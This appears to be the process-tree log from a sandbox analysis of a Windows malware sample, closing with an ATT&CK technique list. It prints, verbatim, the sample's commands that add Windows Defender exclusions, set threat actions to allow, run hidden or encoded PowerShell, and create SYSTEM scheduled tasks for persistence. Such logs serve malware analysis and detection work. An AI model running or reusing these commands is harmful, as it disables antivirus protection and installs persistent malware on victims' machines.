C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ADJLsahCU" /t REG_DWORD /d 0 /reg:32
4⤵
PID:2432

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ADJLsahCU" /t REG_DWORD /d 0 /reg:64
4⤵
PID:940

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AymmxTCbqblaRZJGVqR" /t REG_DWORD /d 0 /reg:32
4⤵
PID:436

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AymmxTCbqblaRZJGVqR" /t REG_DWORD /d 0 /reg:64
4⤵
PID:2572

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DQANlvmTAvZU2" /t REG_DWORD /d 0 /reg:32
4⤵
PID:268

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DQANlvmTAvZU2" /t REG_DWORD /d 0 /reg:64
4⤵
PID:2980

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PZjcxajBIsNTC" /t REG_DWORD /d 0 /reg:32
4⤵
PID:908

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PZjcxajBIsNTC" /t REG_DWORD /d 0 /reg:64
4⤵
PID:2404

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mWJfrhglotUn" /t REG_DWORD /d 0 /reg:32
4⤵
PID:2736

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mWJfrhglotUn" /t REG_DWORD /d 0 /reg:64
4⤵
PID:2680

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\VyWMmqtuSNndeGVB" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1816

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\VyWMmqtuSNndeGVB" /t REG_DWORD /d 0 /reg:64
4⤵
PID:3068

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
4⤵
PID:2004

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
4⤵
PID:1740

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA" /t REG_DWORD /d 0 /reg:32
4⤵
PID:2896

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA" /t REG_DWORD /d 0 /reg:64
4⤵
PID:1824

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WPGfhLqOzAIwKSwi" /t REG_DWORD /d 0 /reg:32
4⤵
PID:2112

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WPGfhLqOzAIwKSwi" /t REG_DWORD /d 0 /reg:64
4⤵
PID:796

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ADJLsahCU" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1952

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ADJLsahCU" /t REG_DWORD /d 0 /reg:64
4⤵
PID:1724

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AymmxTCbqblaRZJGVqR" /t REG_DWORD /d 0 /reg:32
4⤵
PID:2848

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AymmxTCbqblaRZJGVqR" /t REG_DWORD /d 0 /reg:64
4⤵
PID:896

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DQANlvmTAvZU2" /t REG_DWORD /d 0 /reg:32
4⤵
PID:2180

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DQANlvmTAvZU2" /t REG_DWORD /d 0 /reg:64
4⤵
PID:2724

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PZjcxajBIsNTC" /t REG_DWORD /d 0 /reg:32
4⤵
PID:2412

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PZjcxajBIsNTC" /t REG_DWORD /d 0 /reg:64
4⤵
PID:2404

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mWJfrhglotUn" /t REG_DWORD /d 0 /reg:32
4⤵
PID:2188

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mWJfrhglotUn" /t REG_DWORD /d 0 /reg:64
4⤵
PID:1892

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\VyWMmqtuSNndeGVB" /t REG_DWORD /d 0 /reg:32
4⤵
PID:3068

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\VyWMmqtuSNndeGVB" /t REG_DWORD /d 0 /reg:64
4⤵
PID:2680

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
4⤵
PID:2360

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
4⤵
PID:436

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1908

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA" /t REG_DWORD /d 0 /reg:64
4⤵
PID:3040

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WPGfhLqOzAIwKSwi" /t REG_DWORD /d 0 /reg:32
4⤵
PID:2276

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WPGfhLqOzAIwKSwi" /t REG_DWORD /d 0 /reg:64
4⤵
PID:2104

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "XyyyteIMwZeutaZuw" /SC once /ST 00:54:06 /RU "SYSTEM" /TR "\"C:\Windows\Temp\WPGfhLqOzAIwKSwi\CKEIBaXuklpWnmi\syaonpk.exe\" GH /RuOFdidyS 385118 /S" /V1 /F
3⤵
- Creates scheduled task(s)
PID:708

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "XyyyteIMwZeutaZuw"
3⤵
PID:472

C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA\tLVYvupllyMnDiy\HGuESBA.exe
C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA\tLVYvupllyMnDiy\HGuESBA.exe it /bHwdidhHOl 385118 /S
2⤵
PID:2980

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
3⤵
PID:1388

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
4⤵
PID:3060

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
5⤵
PID:2420

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
6⤵
PID:2360

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
4⤵
PID:1724

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
5⤵
PID:2916

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
6⤵
PID:1440

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
4⤵
PID:1640

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
5⤵
PID:2156

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
6⤵
PID:2364

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
4⤵
PID:3036

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
5⤵
PID:472

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
6⤵
PID:2532

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
4⤵
PID:2332

C:\Windows\SysWOW64\cmd.exe
/C powershell start-process -WindowStyle Hidden gpupdate.exe /force
5⤵
PID:2372

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell start-process -WindowStyle Hidden gpupdate.exe /force
6⤵
- Command and Scripting Interpreter: PowerShell
PID:1572

C:\Windows\SysWOW64\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
7⤵
PID:2724

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "XyyyteIMwZeutaZuw" /SC once /ST 09:48:55 /RU "SYSTEM" /TR "\"C:\Windows\Temp\WPGfhLqOzAIwKSwi\CKEIBaXuklpWnmi\nckOrdK.exe\" GH /bEAjdidXU 385118 /S" /V1 /F
3⤵
- Creates scheduled task(s)
PID:1688

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "XyyyteIMwZeutaZuw"
3⤵
PID:3036

C:\Windows\Temp\WPGfhLqOzAIwKSwi\CKEIBaXuklpWnmi\nckOrdK.exe
C:\Windows\Temp\WPGfhLqOzAIwKSwi\CKEIBaXuklpWnmi\nckOrdK.exe GH /bEAjdidXU 385118 /S
2⤵
PID:1172

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
3⤵
PID:2180

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
4⤵
PID:2316

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
5⤵
PID:2736

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
6⤵
PID:2088

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
4⤵
PID:1500

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
5⤵
PID:1008

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
6⤵
PID:2272

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
4⤵
PID:2588

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
5⤵
PID:2112

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
6⤵
PID:2632

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
4⤵
PID:944

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
5⤵
PID:2016

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
6⤵
PID:436

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
4⤵
PID:2392

C:\Windows\SysWOW64\cmd.exe
/C powershell start-process -WindowStyle Hidden gpupdate.exe /force
5⤵
PID:2872

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell start-process -WindowStyle Hidden gpupdate.exe /force
6⤵
- Command and Scripting Interpreter: PowerShell
PID:1632

C:\Windows\SysWOW64\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
7⤵
PID:1944

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "bbmnnUCIPYyTQrzMQJ"
3⤵
PID:1908

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True" &
3⤵
PID:2392

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
4⤵
PID:1928

C:\Windows\SysWOW64\cmd.exe
/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
5⤵
PID:2876

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
6⤵
- Command and Scripting Interpreter: PowerShell
PID:1672

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
7⤵
PID:700

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True"
4⤵
PID:1500

C:\Windows\SysWOW64\cmd.exe
/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
5⤵
PID:1468

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
6⤵
- Command and Scripting Interpreter: PowerShell
PID:2412

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
7⤵
PID:1356

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\ADJLsahCU\fyKEQZ.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "FPieTEPPuEmJrhC" /V1 /F
3⤵
- Creates scheduled task(s)
PID:2308

C:\Windows\Temp\WPGfhLqOzAIwKSwi\CKEIBaXuklpWnmi\syaonpk.exe
C:\Windows\Temp\WPGfhLqOzAIwKSwi\CKEIBaXuklpWnmi\syaonpk.exe GH /RuOFdidyS 385118 /S
2⤵
PID:2680

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
3⤵
PID:796

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
4⤵
PID:2820

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
5⤵
PID:2276

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
6⤵
PID:2360

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
4⤵
PID:1008

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
5⤵
PID:1824

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
6⤵
PID:2016

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
4⤵
PID:2656

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
5⤵
PID:2108

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
6⤵
PID:1724

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
4⤵
PID:2572

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
5⤵
PID:1200

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
6⤵
PID:2272

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
4⤵
PID:1968

C:\Windows\SysWOW64\cmd.exe
/C powershell start-process -WindowStyle Hidden gpupdate.exe /force
5⤵
PID:944

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell start-process -WindowStyle Hidden gpupdate.exe /force
6⤵
- Command and Scripting Interpreter: PowerShell
PID:2596

C:\Windows\SysWOW64\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
7⤵
PID:2892

C:\Windows\system32\taskeng.exe
taskeng.exe {34AE8AC5-7FB7-4605-807A-3246DFF9210D} S-1-5-21-330940541-141609230-1670313778-1000:KXIPPCKF\Admin:Interactive:[1]
1⤵
PID:1912

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
2⤵
- Command and Scripting Interpreter: PowerShell
PID:2244

C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
3⤵
PID:2004

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:1668

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:1832

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

